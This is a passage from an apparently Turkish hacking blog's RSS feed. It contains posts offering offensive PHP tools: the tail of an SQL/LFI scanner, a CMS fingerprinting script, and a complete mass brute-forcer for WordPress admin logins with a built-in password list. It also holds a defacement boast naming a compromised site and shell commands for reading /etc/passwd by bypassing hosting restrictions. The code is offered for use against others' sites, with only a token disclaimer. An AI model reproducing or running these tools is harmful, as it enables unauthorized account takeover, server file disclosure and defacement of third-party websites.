$sqlfound = 1;<br />
}<br />
if ($sqlfound == 0) {<br />
echo &#8221;Sql Yok.&lt;br&gt;&#8221;;<br />
}<br />
}<br />
?&gt;<br />
&lt;/html&gt;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/199/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=199&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/16/lfi-rfi-sql-scanner/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>versiyon bulucu</title>
		<link>http://elc3wad.wordpress.com/2012/01/16/versiyon-bulucu/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/16/versiyon-bulucu/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 12:19:06 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[versiyon bulucu]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=196</guid>
		<description><![CDATA[&#60;?php echo ' &#60;center&#62; &#60;form action="" method="post"&#62; &#60;textarea name="siteler" style="height: 204px; width: 571px"&#62;&#60;/textarea&#62; &#60;br&#62;&#60;input type="submit" value="bul bakalım"&#62; &#60;/center&#62; '; $siteler = $_POST["siteler"]; $smf = 'Powered by SMF'; $joomla = 'Joomla!'; $vbulletin = 'Powered by vBulletin'; if(! $siteler =='') { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); $explode = explode("\n",$siteler); foreach ($explode as $ver) { $trim = trim($ver); curl_setopt($curl,CURLOPT_URL,$trim); [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=196&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span id="more-196"></span></p>
<pre>&lt;?php
echo '
     &lt;center&gt;
	 &lt;form action="" method="post"&gt;
	 &lt;textarea name="siteler" style="height: 204px; width: 571px"&gt;&lt;/textarea&gt;
	 &lt;br&gt;&lt;input type="submit" value="bul bakalım"&gt;
	 &lt;/center&gt;
	 ';

$siteler        =  $_POST["siteler"];
$smf            =  'Powered by SMF';
$joomla         =  'Joomla!';
$vbulletin      =  'Powered by vBulletin';

if(! $siteler =='')
{

$curl           =  curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$explode        =  explode("\n",$siteler);
foreach ($explode as $ver)
{
$trim           = trim($ver);
curl_setopt($curl,CURLOPT_URL,$trim);
$hayde          =curl_exec($curl);

     if (eregi ($smf,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '&lt;center&gt;&lt;font color="red"&gt;&lt;b&gt;smf bulundu : '.$trim.'&lt;/font&gt;&lt;/center&gt;';
     }

     elseif (eregi ($joomla,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '&lt;center&gt;&lt;font color="blue"&gt;&lt;b&gt;joomla bulundu : '.$trim.'&lt;/font&gt;&lt;/center&gt;';
     }

     elseif (eregi ($vbulletin,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '&lt;center&gt;&lt;font color="green"&gt;&lt;b&gt;vbulletin bulundu : '.$trim.'&lt;/font&gt;&lt;/center&gt;';
     }
}
}
echo '&lt;center&gt;coded by burtay&lt;/center&gt;';
?&gt;</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/196/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=196&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/16/versiyon-bulucu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>Gradyteam.org KAPAK HACKED</title>
		<link>http://elc3wad.wordpress.com/2012/01/15/gradyteam-org-kapak-hacked/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/15/gradyteam-org-kapak-hacked/#comments</comments>
		<pubDate>Sun, 15 Jan 2012 19:13:34 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[Gradyteam.org Hacked]]></category>
		<category><![CDATA[Hacked by eL-CeWaD]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=194</guid>
		<description><![CDATA[Site: Gradyteam.org Zone Kaydı: http://golgeler.net/view-%3E6537<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=194&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="color:#ff0000;">Site:</span> <span style="color:#0000ff;">Gradyteam.org</span></p>
<p><span style="color:#ff0000;">Zone Kaydı: <span style="color:#0000ff;"><a href="http://golgeler.net/view-%3E6537"><span style="color:#0000ff;">http://golgeler.net/view-%3E6537</span></a></span></span></p>
<span style="text-align:center; display: block;"><a href="http://elc3wad.wordpress.com/2012/01/15/gradyteam-org-kapak-hacked/"><img src="http://img.youtube.com/vi/NxgooDUOKMA/2.jpg" alt="" /></a></span>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/194/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=194&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/15/gradyteam-org-kapak-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>wordpress brute force php script &#124; online bruter</title>
		<link>http://elc3wad.wordpress.com/2012/01/15/wordpress-brute-force-php-script-online-bruter/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/15/wordpress-brute-force-php-script-online-bruter/#comments</comments>
		<pubDate>Sun, 15 Jan 2012 12:51:29 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[wordpress brute force php script]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=192</guid>
		<description><![CDATA[Ön izleme resmi ; http://img339.imageshack.us/img339/284/37826253.gif WordPress Brute Force Toplu deneyici.Script izleyicinin kodlamış olduğu wordpress brute forcenin değişik bir versiyonudur Turkblackhats.com üyeleri için paylaşılmıştır.Her hakkı Turkblackhats.com a aittir.Kalitenin adresi turkblackhats.com &#60;?php echo " &#60;!-- Wordpress Admin Panel Penetration Testing V 1 PS: this tool is for penetration testing and educational purpose, turkblackhats.com is not responsible at [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=192&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="color:#ff0000;">Ön izleme resmi ;</span></p>
<p><span style="color:#0000ff;"><a href="http://img339.imageshack.us/img339/284/37826253.gif"><span style="color:#0000ff;">http://img339.imageshack.us/img339/284/37826253.gif</span></a></span></p>
<p><strong>WordPress Brute Force Toplu deneyici.Script izleyicinin kodlamış olduğu wordpress brute forcenin değişik bir versiyonudur Turkblackhats.com üyeleri için paylaşılmıştır.Her hakkı Turkblackhats.com a aittir.Kalitenin adresi turkblackhats.com</strong></p>
<p><span id="more-192"></span></p>
<pre>&lt;?php
echo "
&lt;!--
Wordpress Admin Panel Penetration Testing
V 1
PS: this tool is for penetration testing and educational purpose, turkblackhats.com is not responsible at any bad using for this tool.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
--&gt;
";

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
?&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Turkblackhats.com | WordPress Admin Panel Penetration Testing&lt;/title&gt;
&lt;meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8&gt;

&lt;style type="text/css"&gt;
body {
	color: white;
	background-image: url(http://t1.gstatic.com/images?q=tbn:ANd9GcRQa5CloHyQPcJ7ghTVn0VlylyAvRnVArdDmu2f98SSS7U92rRX);
}
textarea {
	border-radius: 8px;
	color: white;
	background-color:black;
}
input[type=submit] , .submit{
		background-color:black;
		color:white;
		border-radius:8px;
}
p {
	font-size: 10px;
	text-align: center;
}
a:link,a:hover,a:visited {
	color:pink;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;!-- turkblackhats.com | WordPress Admin Panel Penetration Testing --&gt;
&lt;center&gt;
&lt;p&gt;&lt;a href="http://www.turkblackhats.com" target="_blank"&gt;&lt;img src="http://2.bp.blogspot.com/_gnm2C1B8vbI/RtsXECxw5iI/AAAAAAAAAsM/PwfxmL8l7pM/s400/black_hat.jpg" border="0"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;form enctype="multipart/form-data" method="POST"&gt;
  &lt;table width='624' border='0' id='Box'&gt;
    &lt;tr&gt;
&lt;td width='4%'&gt;&amp;nbsp;&lt;/td&gt;
&lt;td width="96%" colspan="3" align="center" &gt;&lt;p&gt;turkblackhats.com | WordPress Admin Panel Penetration Testing &lt;/p&gt;&lt;/td&gt;
&lt;/tr&gt;
    &lt;tr&gt;
      &lt;td &gt;&amp;nbsp;&lt;/td&gt;
      &lt;td &gt;&lt;p&gt;Hosts:&lt;/p&gt;&lt;/td&gt;
      &lt;td &gt;&lt;p&gt; Users:&lt;/p&gt;&lt;/td&gt;
      &lt;td &gt;&lt;p&gt;Passwords:&lt;/p&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;&amp;nbsp;&lt;/td&gt;
      &lt;td &gt;&lt;textarea name="hosts" cols="30" rows="10" &gt;&lt;?php if($_POST){echo $_POST['hosts'];} ?&gt;&lt;/textarea&gt;&lt;/td&gt;
      &lt;td &gt;&lt;textarea name="usernames" cols="30" rows="10"  &gt;&lt;?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?&gt;&lt;/textarea&gt;&lt;/td&gt;
      &lt;td &gt;&lt;textarea name="passwords" cols="30" rows="10"  &gt;&lt;?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&amp;*(\n(*&amp;^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?&gt;&lt;/textarea&gt;&lt;/td&gt;
    &lt;/tr&gt;
&lt;tr&gt;&lt;td colspan="4"&gt;&lt;input type="submit" name="submit" value="Brute Now"  /&gt;
&lt;?php
if($_POST)
{
	$hosts = trim(filter($_POST['hosts']));
	$passwords = trim(filter($_POST['passwords']));
	$usernames = trim(filter($_POST['usernames']));

	if($passwords &amp;&amp; $usernames &amp;&amp; $hosts)
	{
		$hosts_explode = explode("\n", $hosts);
		$usernames_explode = explode("\n", $usernames);
    	$passwords_explode = explode("\n", $passwords);

		foreach($hosts_explode as $host)
		{
			$host = RemoveLastSlash($host);
			$hacked = 0;
			$host = str_replace(array("http://","https://","www."),"",trim($host));
			$host = "http://".$host;
			$wpAdmin = $host.'/wp-admin/';

			if(!url_exists($host."/wp-login.php"))
			{echo "&lt;p&gt;".$host." =&gt; &lt;font color='red'&gt;Error In Login Page !&lt;/font&gt;&lt;/p&gt;";ob_flush();flush();continue;}

			foreach($usernames_explode as $username)
			{
				foreach($passwords_explode as $password)
				{
					$ch   =     curl_init();
					curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
					curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
					curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
					curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
					curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
					curl_setopt($ch,CURLOPT_POST,TRUE);
					curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&amp;pwd=".$password."&amp;wp-submit=Giri‏"."&amp;redirect_to=".$wpAdmin."&amp;testcookie=1");
					$login    =	   curl_exec($ch);

					if(eregi ("profile.php",$login) )
					{
						$hacked = 1;
						echo "&lt;p&gt;".$host." =&gt; UserName : [&lt;font color='green'&gt;".$username."&lt;/font&gt;] : Password : [&lt;font color='green'&gt;".$password."&lt;/font&gt;]&lt;/p&gt;";
						ob_flush();flush();break;
					}
				}
				if($hacked == 1){break;}
			}
			if($hacked == 0)
			{echo "&lt;p&gt;".$host." =&gt; &lt;font color='red'&gt;Failed !&lt;/font&gt;&lt;/p&gt;";ob_flush();flush();}
		}
	}
	else {echo "&lt;p&gt;&lt;font color='red'&gt;All fields are Required ! &lt;/font&gt;&lt;/p&gt;";}
}
?&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;&lt;/form&gt;

&lt;!-- Turkblackhats.com | WordPress Admin Panel Penetration Testing --&gt;
&lt;p&gt;powered by &lt;a href="http://turkblackhats.com"&gt;turkblackhats.com&lt;/a&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;p&gt;
  &lt;?php
function url_exists($strURL)
{
    $resURL = curl_init();
    curl_setopt($resURL, CURLOPT_URL, $strURL);
    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
    curl_exec ($resURL);
    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
    curl_close ($resURL);
    if ($intReturnCode != 200){return false;}
	else{return true ;}
}
function filter($string)
{
	if(get_magic_quotes_gpc() != 0){return stripslashes($string);	}
	else{return $string;	}
}
function RemoveLastSlash($host)
{
	if(strrpos($host, '/', -1) == strlen($host)-1)
	{return substr($host,0,strrpos($host, '/', -1));}
	else{return $host;}
}
?&gt;
&lt;?php  echo "&lt;/p&gt;"; ?&gt;</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/192/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/192/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/192/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=192&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/15/wordpress-brute-force-php-script-online-bruter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>Bütün Serverlarda geçerli priv9 Bypass</title>
		<link>http://elc3wad.wordpress.com/2012/01/14/butun-serverlarda-gecerli-priv9-bypass/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/14/butun-serverlarda-gecerli-priv9-bypass/#comments</comments>
		<pubDate>Sat, 14 Jan 2012 20:33:39 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[Bypass]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=189</guid>
		<description><![CDATA[Ln -s ile çekmeye çalıştığımız verileri özel htaccesslerle okuyordık eskiden ama yinede forbidden denen illeti aşamıyorduk şuan yeni bir sistem bulunddu btüm sürümlerde etkili bir açık. ln&#8211;help diyeceksiniz sonra ln -b /etc/passwd izo.txt yapın bakın bakim nasıl okuyor forbidden vermeden ikinci bir teknikte ln -v /etc/passwd izo1 İzleyici<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=189&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ln -s ile çekmeye çalıştığımız verileri özel htaccesslerle okuyordık eskiden<br />
ama yinede forbidden denen illeti aşamıyorduk<br />
şuan yeni bir sistem bulunddu btüm sürümlerde etkili bir açık.<br />
ln&#8211;help diyeceksiniz<br />
sonra ln -b /etc/passwd izo.txt yapın bakın bakim nasıl okuyor forbidden vermeden<br />
ikinci bir teknikte ln -v /etc/passwd izo1</p>
<p><span style="color:#ff0000;">İzleyici</span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/189/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=189&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/14/butun-serverlarda-gecerli-priv9-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
	</channel>
</rss>
